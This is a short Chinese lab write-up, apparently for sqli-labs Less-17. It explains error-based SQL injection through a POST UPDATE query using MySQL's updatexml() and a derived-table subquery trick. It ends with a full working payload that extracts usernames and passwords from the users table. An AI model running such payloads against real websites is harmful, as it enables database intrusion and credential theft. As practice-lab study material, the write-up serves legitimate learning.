Less17: POST注入,UPDATE语句,有错误回显
新知识点:
1. update注入方法
参考:http://www.mamicode.com/info-detail-1665678.html
语句
or updatexml(1,concat(0x7e,(version())),0) or
关键函数:UpdateXML(xml_target, xpath_expr, new_xml)
xml_target:是一个目标xml
xpath:是一个xpath语句
new_xml:新xml
作用:将xml_target中符合xpath_expr的部分都用new_xml更新。
能够用于注入是因为,当xpath不符合语法时,该语句会报错XPATH syntax error:
故,可以将待查询的信息放入xpath中,通过报错回显出来。
该方法有长度限制,最长32位
2. 解决在同一语句中不能先select出同一表中的某些值,再update这个表的限制
通过子查询,使select的表更换一个名称
update tableA set col1='' and updatexml(0,concat(0x7e, (select col2 from (select col2 from tableA limit 0,1)x)),1)
具体问题解决:
前期作弊,看了看代码,发现uname有check函数,不能注入。password可以注入。而且select语句没有注入,只有password的update语句有注入。
页面显示了名字是Dhakkan,那就用这个名字了。password用上面提到的方法。整个payload为:
uname=Dhakkan&passwd=' and updatexml(0,concat(0x7e, (select a from (select concat(username,':',password) a from users limit 0,1)x)),1) -- a&submit=Submit
显示报错:XPATH syntax error: '~Dumb:Dumb'
说明注入成功。